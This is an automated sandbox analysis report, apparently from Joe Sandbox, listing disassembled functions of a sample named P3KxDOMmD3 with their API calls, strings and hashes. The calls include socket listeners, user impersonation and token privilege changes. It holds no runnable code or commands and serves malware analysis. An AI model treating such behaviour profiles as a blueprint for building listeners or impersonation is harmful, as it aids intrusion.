Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonsioctlsocketlistensocket
String ID:
API String ID: 1767165869-0
Opcode ID: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
Instruction ID: 20277dcdf1c343fd712384b8841c0a27075375c39bd243faa5f60102d07d7b9e
Opcode Fuzzy Hash: f4b350054c05ef1cd9ff918b3eebb66b28a02a47d439b5acf83660ca504c3395
Instruction Fuzzy Hash: 89112631310B5482DB248F16E420359B762F788FA4F858634EE5E53B64CF3DD456C700

Function 00676670 Relevance: 9.1, APIs: 6, Instructions: 57networkCOMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 00676698
htons.WS2_32 ref: 006766A4
socket.WS2_32 ref: 006766BC
closesocket.WS2_32 ref: 006766CE
bind.WS2_32 ref: 006766FB
ioctlsocket.WS2_32 ref: 00676715

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonlhtonsioctlsocketsocket
String ID:
API String ID: 3910169428-0
Opcode ID: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
Instruction ID: d8364017e29b8a6f0fc31d9fb4209b82eade7849c5e9f444018a36658612b3d4
Opcode Fuzzy Hash: b53a2f792c81892d7b6d7ca8ab412e3f2e468a0ee1017cf91dd071cea0dc5194
Instruction Fuzzy Hash: 0111B135311B4097D7249F21E8243997762F788BA4F958239DE1A43794DF3DC95AC740

Function 0067DF50 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0067DCC0: RevertToSelf.ADVAPI32 ref: 0067DCDD

LogonUserA.ADVAPI32 ref: 0067DF98
GetLastError.KERNEL32 ref: 0067DFA2

Part of subcall function 00675FEC: malloc.LIBCMT ref: 00676008

Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FE81
Part of subcall function 0066FE54: MultiByteToWideChar.KERNEL32 ref: 0066FEA9

Part of subcall function 0066D044: malloc.LIBCMT ref: 0066D057

ImpersonateLoggedOnUser.ADVAPI32 ref: 0067DFC0
GetLastError.KERNEL32 ref: 0067DFCA

Strings

%s\%s, xrefs: 0067E084

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiUserWidemalloc$ImpersonateLoggedLogonRevertSelf
String ID: %s\%s
API String ID: 3621627092-4073750446
Opcode ID: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
Instruction ID: c23be3ee67aa09ac1aac6bdd0082120723da9cefab7562a0a514cdcd65bd2716
Opcode Fuzzy Hash: 21501fd99f5b763e027db7a7b361eaf12fbcf34ba50608c9b89ed7353f562f62
Instruction Fuzzy Hash: 1A318B30314B4191EB40FB22F86435A23A7FB8AB80F804029EA4E57F66DF3EC165CB45

Function 0066FA1C Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0066FA3D
Sleep.KERNEL32 ref: 0066FAAC
GetTickCount.KERNEL32 ref: 0066FAB2
Sleep.KERNEL32 ref: 0066FACB
closesocket.WS2_32 ref: 0066FAD4

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CountSleepTick$closesocket
String ID:
API String ID: 2363407838-0
Opcode ID: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
Instruction ID: 225c3144836ed55f75402d078613cef5556b0c92f46d9bf16291872aee3931d8
Opcode Fuzzy Hash: 10e278be78da8f1e85a2fadd26c76492043cbdbeff7cfa22a85522b80d216db2
Instruction Fuzzy Hash: A711D221704A8092CA50EB62F45521AA392F785BF0F444735FEBE47BE6DE3CC6468B45

Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
GetCurrentProcessId.KERNEL32 ref: 004019E0
GetCurrentThreadId.KERNEL32 ref: 004019E8
GetTickCount.KERNEL32 ref: 004019F0
QueryPerformanceCounter.KERNEL32 ref: 004019FE

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708

Function 0067EE8C Relevance: 7.6, APIs: 5, Instructions: 53networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

socket.WS2_32 ref: 0067EEC1
closesocket.WS2_32 ref: 0067EED3
htons.WS2_32 ref: 0067EEE4
bind.WS2_32 ref: 0067EF05
listen.WS2_32 ref: 0067EF1A

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: bindclosesockethtonslistensocket
String ID:
API String ID: 564772725-0
Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
Instruction ID: 7639010fca12233a93f18edaacb0714942ccd48183b1a2ce934c52e116504c89
Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
Instruction Fuzzy Hash: 8D110435614B5582DB20EF12E82531AB362F788FE0F548665EE9D07FA4DF7EC1198704

Function 0066D83C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE

Download Yara Rule

Strings

%s!%s, xrefs: 0066D9EB

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID: %s!%s
API String ID: 0-2935588013
Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
Instruction ID: 339d4963c7e48f7d5eab9816edd3ce58a4595f6ab105ea75f3ca995b74269556
Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
Instruction Fuzzy Hash: A2518D76B04A80C6DB24DF66D0406A97362F388FD8F84852AEF8E57758DF38C942C744

Function 00670B70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32 ref: 00670BEA
AdjustTokenPrivileges.ADVAPI32 ref: 00670C1A
GetLastError.KERNEL32 ref: 00670C24

Strings

%s, xrefs: 00670C32

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID: %s
API String ID: 4244140340-620797490
Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
Instruction ID: 2d8aa08465468c05ae3a8d0ae3c732c9e61822b2c26229a58da37efd2c490324
Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
Instruction Fuzzy Hash: 8C217C72B00B01AAEB14DB71D4557ED73B6F758B88F84852A9E4C93B48EF74C629C390

Function 00675854 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0067587B
Sleep.KERNEL32 ref: 006758CA
GetTickCount.KERNEL32 ref: 006758D0
WSAGetLastError.WS2_32 ref: 006758DA

Part of subcall function 00675A20: ioctlsocket.WS2_32 ref: 00675A42

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepioctlsocket
String ID:
API String ID: 1121440892-0
Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
Instruction ID: fcd2c79b4b1f667fb8cce6bcefae5cc02d7a34ed8ad0a29df97c4b622c4aa0d8
Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
Instruction Fuzzy Hash: 77316B36B00F40D6DB00DBA2E4942AC77BAF388B90F51466ADE6E93B94DE31C555C344

Function 001CB7B0 Relevance: 5.9, Strings: 4, Instructions: 884COMMONLIBRARYCODE

Download Yara Rule

Strings

ailure #%d - %s, xrefs: 001CC41F, 001CC498, 001CC511, 001CC58A
<, xrefs: 001CBE6E
, xrefs: 001CBE63
e ', xrefs: 001CC405, 001CC47E, 001CC4F7, 001CC570

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID: $<$ailure #%d - %s$e '
API String ID: 0-963976815
Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
Instruction ID: 875dd6fd0587a974ac1acf23bae3dc22a9181987aed168fd786f8758df7145ac
Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
Instruction Fuzzy Hash: 7D92D3B2329A8087DB58CB1DE4A173AB7A1F3C8B84F44512AE79B87794CE3CD551CB44

Function 0066DA3C Relevance: 4.9, APIs: 3, Instructions: 374memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00676114: htonl.WS2_32 ref: 00676131

GetLastError.KERNEL32 ref: 0066DD33

Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D

HeapCreate.KERNEL32 ref: 0066DCDA
HeapAlloc.KERNEL32 ref: 0066DCF8

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
String ID:
API String ID: 3419463915-0
Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
Instruction ID: 52fe5b68eb4c93ed57c1751ba93f5dd3d32ebf759edd96eaf3318f5250c8f75b
Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
Instruction Fuzzy Hash: 21E1B1B3B10B4187EB64DB35E8413AA63A2F799794F088125DB8E97B55EF3DE446C300

Function 00402314 Relevance: 4.6, APIs: 3, Instructions: 75COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E

Function 0068C3B0 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 0068CA63
<, xrefs: 0068CA6E

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID: $<
API String ID: 0-428540627
Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
Instruction ID: 029e6c0c50f8178ac7a0873f28322fe44d81e9b0db15bd0f8f991eaa75d97d41
Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
Instruction Fuzzy Hash: DE92D1B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04

Function 001CC397 Relevance: 2.6, Strings: 2, Instructions: 134COMMON

Download Yara Rule

Strings

ailure #%d - %s, xrefs: 001CC41F, 001CC498, 001CC511, 001CC58A
e ', xrefs: 001CC405, 001CC47E, 001CC4F7, 001CC570

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID: ailure #%d - %s$e '
API String ID: 0-4163927988
Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
Instruction ID: ec6c28a2629b973ec245a2b5201f0cb2fca8ea9cd88e4a8d25ed745c8d90d11e
Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
Instruction Fuzzy Hash: A7510AB6214A508BD714CB09E4E076AB7E1F3CCB94F84561AE38B8B768DB3CD545CB40

Function 001CCFF0 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction ID: 82b5d1063a700ef63de224473fde504350dfbea355db83ab48aaa914c7c492b6
Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction Fuzzy Hash: 235241B221898587D708CB1CE4A177AB7E1F3C9B80F44852AE79B8B799CE3DD554DB00

Function 0068DBF0 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction ID: bc1ccaeb1530266df738040eaae3fae955189e00e07f680a2e6a2761b34d835d
Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction Fuzzy Hash: 7E5250B22149458BD708CB1CE4A173AB7E2F3C9B80F44852AE7978BB99CE3DD555CB40

Function 001CC680 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction ID: ce355b0243cb639f74432b96568eac3b2256156551a439938dfd84188c558197
Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction Fuzzy Hash: CA5240B22149818BD708CF1DE4A177AB7E1F3C9B80F44852AE78A8B799CA3DD545CF40

Function 0068D280 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction ID: 5164de9d090b26616ad0d3930c8619f64b1833a30633e82543ad9ecf93fad533
Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction Fuzzy Hash: 485255B22145808BD708CF1DE4A173AB7E2F3C9B80F44852AE7968BB99CA3DD555CF40

Function 001A9680 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
Instruction ID: 0e5a797c056a3b603dc5714ecbf7d852c9887fbf52f5745a24cee88d7c1c311a
Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
Instruction Fuzzy Hash: 65E1D87A718A4296DF30DB25E4906AE73A1F7AA798F900115EF4D87748EF38CD85CB40

Function 0066A280 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
Instruction ID: 97788dc11d1859d5af95f783d0f149c7900d8f14816fea1324a533bb0f57b2cf
Opcode Fuzzy Hash: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
Instruction Fuzzy Hash: ACE1D776318A4296DB20CBA5E4902AE67B3F795788F904115EF4DA7708EF39CE06CF41

Function 001ACE3C Relevance: .4, Instructions: 374COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
Instruction ID: 478000ad0292b6d07a9389f9cf01eca55c7dab24efc3bc0c4dde27ee49546022
Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
Instruction Fuzzy Hash: D4E19CB6B10B4187EB24CB35E8413AA63A2F799795F488125DB8F97B51EF3CE485C340

Function 001A916C Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
Instruction ID: d57bf8e47affcda77c628be205ea94685852170c192f6ea003444fb5114afa0b
Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
Instruction Fuzzy Hash: 1ED1197B704B4292DF20DF65D8902AE6761FBE6798F900012EF4E97658EF34C986C740

Function 00669D6C Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
Instruction ID: a68336142a694b4ea7778f662b1399bda95fa39f36c900c5556e207a4f108332
Opcode Fuzzy Hash: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
Instruction Fuzzy Hash: 6ED1D572304A4292DF20DBA5D4902EEA766F794798F900116EF4E97718EF36CE46CB40

Function 001B0334 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
Instruction ID: 84848dc8c9b8eb3aba007217a0bbcd6b803f8d12ccf809fb5b860898a47fbc9a
Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
Instruction Fuzzy Hash: 37617B32714B40D6EB249F62E88439E73E1F79CB94F11512AEA4E83B24DF79C995CB40

Function 0068CF97 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
Instruction ID: 7bf834dff18ef2d97432191af032f825d37cd7e6b1fb4cc17482811a90c83697
Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
Instruction Fuzzy Hash: D1510CB6214A508BD754CB0DE4A072AB7E2F3CCBD4F84521AE38B87B68DA3DD555CB40

Function 00692020 Relevance: .0, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
Instruction ID: c18a84c296884c2148f3584f8dcdcb74ce16d9512609834e75fb3b08a9be0ab6
Opcode Fuzzy Hash: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
Instruction Fuzzy Hash: 9EF0FFD7E1DAE26ADB2346640C7D1982F57A4B2A2134DC14F8B8053F93A4060C01D312

Function 004542E4 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
Instruction ID: 6df1996fe5ab077fac6f5f648561be467765c73faf68bb16cd4171b126be2ea7
Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
Instruction Fuzzy Hash: 60D0C7C7F5DFD096D32281A40C6A0692F91B5F291535E818FAE4497397B40C1D4D5315

Function 00692630 Relevance: .0, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
Instruction ID: 539d35eff73e93ac76602df4a068df1f8cc5d4c668e64a5cd509f388140b9171
Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
Instruction Fuzzy Hash: 44D05EFBE1DBD21BEB6382284C3D2882F66A162A2074C408F878007FA3E44A1801C311

Function 00692050 Relevance: .0, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
Instruction ID: c624cead7d371148b89316b008a246588d0c5e32bc8caaeb701ddc815d516811
Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
Instruction Fuzzy Hash: B1C04C57A14AD1579B125A15087A5942B57E5D3D3238A82998D5183E47900A5C17E311

Function 006924F0 Relevance: .0, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
Instruction ID: 8009e9f2c8603c0aa392f075b10aaf32735fc7346bb9e3a3e5ffbe436e7b62eb
